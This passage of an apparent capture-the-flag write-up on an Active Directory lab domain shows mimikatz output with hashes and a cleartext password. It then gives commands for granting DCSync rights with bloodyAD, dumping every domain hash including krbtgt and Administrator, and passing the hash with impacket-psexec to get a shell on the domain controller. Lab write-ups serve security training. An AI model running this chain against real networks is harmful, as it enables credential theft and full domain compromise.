         * NTLM     : 85edf6aacad2ac8e2a7a44741eb0b236
         * SHA1     : aab02ea07aee541e9f60a1f6d5a54a2045965743
        tspkg :
        wdigest :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        kerberos :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 11136230 (00000000:00a9ece6)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 11136190 (00000000:00a9ecbe)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 91296 (00000000:000164a0)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/4/27 15:43:55
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
        msv :
         [00000003] Primary
         * Username : chenglei
         * Domain   : XIAORANG
         * NTLM     : 0c00801c30594a1b8eaa889d237c5382
         * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
         * DPAPI    : 89b179dc738db098372c365602b7b0f4
        tspkg :
        wdigest :
         * Username : chenglei
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : chenglei
         * Domain   : XIAORANG.LAB
         * Password : Xt61f3LBhg1
        ssp :
        credman :

Authentication Id : 0 ; 53263 (00000000:0000d00f)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : b5cd3591a58e1169186bcdbfd4b6322d
         * SHA1     : 226ee6b5e527e5903988f08993a2456e3297ee1f
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;` Nfr;; Hf8O'Szfl0Z = w+^,> 0jR
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win-hauwolao$
         * Domain   : XIAORANG.LAB
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 24185 (00000000:00005e79)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:52
SID               :
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 11159180 (00000000:00aa468c)
Session           : RemoteInteractive from 2
User Name         : lv
Domain            : WIN-HAUWOLAO
Logon Server      : WIN-HAUWOLAO
Logon Time        : 2025/4/27 16:53:43
SID               : S-1-5-21-2057596273-973658165-3030246172-1000
        msv :
         [00000003] Primary
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * NTLM     : 85edf6aacad2ac8e2a7a44741eb0b236
         * SHA1     : aab02ea07aee541e9f60a1f6d5a54a2045965743
        tspkg :
        wdigest :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        kerberos :
         * Username : lv
         * Domain   : WIN-HAUWOLAO
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 91297 (00000000:000164a1)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/4/27 15:43:55
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
        msv :
         [00000003] Primary
         * Username : chenglei
         * Domain   : XIAORANG
         * NTLM     : 0c00801c30594a1b8eaa889d237c5382
         * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
         * DPAPI    : 89b179dc738db098372c365602b7b0f4
        tspkg :
        wdigest :
         * Username : chenglei
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : chenglei
         * Domain   : XIAORANG.LAB
         * Password : Xt61f3LBhg1
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 53235 (00000000:0000cff3)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:53
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * NTLM     : 00f24a2e0e0076b23f55b10e54d4cc25
         * SHA1     : 8c03f31f89359af762fe0f271a0d61a64ef6eca1
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : WIN-HAUWOLAO$
         * Domain   : xiaorang.lab
         * Password : 18 81 7a 3c 1c ec 03 ec 71 bd fd a6 5f c7 1d d8 be 20 8f e4 e2 f2 96 d1 01 1a 88 7f 4c 07 89 bd 00 45 80 3d b0 61 e5 73 be e2 b4 01 9b 14 88 64 e7 ad 83 83 65 0a 53 40 9f 44 a9 90 b2 aa 04 c7 e1 23 f5 dd 3e f4 5d b3 13 88 9e 67 1f 0a 8a 18 5f dd 82 d2 f0 e1 41 5d 12 6f 8f bb 44 05 66 8d 10 40 e2 5d 97 c8 48 ea 5d 74 d8 7b 5b 1a 5f 9e 94 3a 21 01 c7 9f a5 c9 79 3c 70 91 4c 52 4e 69 ce f6 fe 0f db 54 2a 7c 3c 3a 71 99 2a a9 3e 3d 4e 06 b1 b7 8d 11 a7 7b 71 5a 7d 8c f3 cb 2b f7 c0 eb 74 64 e7 c7 f0 32 36 d0 03 1f f2 69 25 52 5f 18 05 0e 66 1f 82 b4 a7 99 11 c7 64 b5 78 05 c1 91 94 f7 16 8c d0 04 7e 0f e3 2b 7c 83 af 3d d9 46 fd da d8 cd 5c af 89 cd 93 78 14 68 f5 e4 71 55 0f a1 7d c6 9e f6 7f 0c 5d 62 f6 33 5b 12
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/4/27 15:43:52
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-HAUWOLAO$
         * Domain   : XIAORANG
         * Password : (null)
        kerberos :
         * Username : win-hauwolao$
         * Domain   : XIAORANG.LAB
         * Password : (null)
        ssp :
        credman :

mimikatz #
```
The dump yields a domain user, XIAORANG\chenglei, with the cleartext password Xt61f3LBhg1 (from the kerberos provider of a service logon). Check the account's group memberships in the domain:

```console
C:\Users\Administrator\flag> net user chenglei /domain
The request will be processed at a domain controller for domain xiaorang.lab.

User name                    chenglei
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2023/7/11 14:57:52
Password expires             Never
Password changeable          2023/7/12 14:57:52
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2025/4/27 16:57:57

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *ACL Admin            *Domain Users
The command completed successfully.
```
chenglei is a member of ACL Admin. That group holds WriteDACL, which is enough to add the replication ACEs (DS-Replication-Get-Changes and -Get-Changes-All) on the domain object, so chenglei can grant DCSync rights to themselves with bloodyAD against the DC (run through the proxy):

```console
┌──(root㉿kali)-[~/Desktop/tmp/123]
└─# bloodyAD --host 172.22.13.6 -d "XIAORANG.LAB" -u chenglei -p Xt61f3LBhg1 add dcsync "chenglei"
[+] chenglei is now able to DCSync
```
Then log in remotely as chenglei and run DCSync from mimikatz to pull every hash in the domain:

```console
mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'WIN-DC.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
1104    zhangwen        fa7d776fdfc82d3f43c9d8b7f5312d77        512
502     krbtgt          cb976ec1a1bf8a14a15142c6fecc540e        514
1106    zhangtao        e786c4a4987ced162c496d0519496729        512
1000    WIN-DC$         5a5c8ad1abcec444c534563d7db5c332        532480
500     Administrator   6341235defdaed66fb7b682665752c9a        512
1105    chenglei        0c00801c30594a1b8eaa889d237c5382        512
1103    WIN-HAUWOLAO$   00f24a2e0e0076b23f55b10e54d4cc25        4096
```
With the Administrator NTLM hash, move laterally to the domain controller by passing the hash. The DC reports build 10.0.20348, i.e. Windows Server 2022, and the decoding warnings come from its Chinese-locale console output:

```console
┌──(root㉿kali)-[~/Desktop/tmp/123]
└─# impacket-psexec -hashes :6341235defdaed66fb7b682665752c9a Administrator@172.22.13.6
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 172.22.13.6.....
[*] Found writable share ADMIN$
[*] Uploading file hUqShSba.exe
[*] Opening SVCManager on 172.22.13.6.....
[*] Creating service PuTe on 172.22.13.6.....
[*] Starting service PuTe.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [版本 10.0.20348.1787]
[-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation。保留所有权利。

C:\Windows\system32>
```

flag04 is under C:\Users\Administrator\flag.